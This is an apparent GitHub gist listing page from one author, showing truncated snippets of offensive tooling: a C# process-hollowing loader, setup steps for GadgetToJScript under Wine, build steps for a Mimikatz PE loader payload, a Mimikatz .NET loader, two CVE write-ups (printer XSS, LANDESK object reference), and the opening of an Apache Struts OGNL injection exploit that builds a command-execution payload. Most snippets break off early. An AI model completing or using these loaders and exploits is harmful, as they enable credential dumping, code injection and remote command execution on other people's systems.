Mohamed El Azaar med0x2e

med0x2e / process-hollowing.cs
Last active Mar 28, 2021
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
public class Loader
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
med0x2e / steps.txt
Last active Apr 16, 2021
Steps to run GadgetToJScript on linux (wine)
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
View Steps.txt
1. Download the latest release of mimikatz:
2. Get Mimikatz PE Loader from
3. Use the katz.cs file from @pljoel: uncomment the build lines in Delivery.Program.Main() and comment out the Exec() line.
4. Build it to generate file.b64, copy its content and replace the Package.file string in payload.txt.
6. Make sure the payloadPath variable is set correctly in "TestAssemblyLoader.cs".
View gist:2715d32602ba688ea3bc239a3d5f8214
[Suggested description]
The web console of the Samsung printer model "SCX-824" contains a
reflected Cross-Site Scripting (XSS) vulnerability. It can be
triggered through the "print from file" feature, which forwards the
user to the following URL:
The vulnerable parameter "msg" is not properly encoded before being interpreted as HTML/JS.
View sct.png
<?XML version="1.0"?>
med0x2e / compiler-input-obj.xml
Last active Aug 28, 2018
CompilerInput Object
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="" xmlns="">
<files xmlns:d2p1="">
<parameters xmlns:d2p1="">
<assemblyNames xmlns:d3p1="" xmlns="">
<d3p1:anyType xmlns:d4p1="" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
<compilerOptions i:nil="true" xmlns="" />
med0x2e / katz.whatever
Last active Apr 30, 2021
Mimikatz .NET Loader
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;
public class KatzWFCompiler : SequentialWorkflowActivity
public KatzWFCompiler()
med0x2e / CVE-2017-11463
Last active Dec 15, 2017
[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference leads to referencing/updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in an HTTP payload in order to retrieve a
key/token and use it to access/update objects belonging to other
users. Such objects could be user profiles, tickets, incidents, etc.
[Additional Information]
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."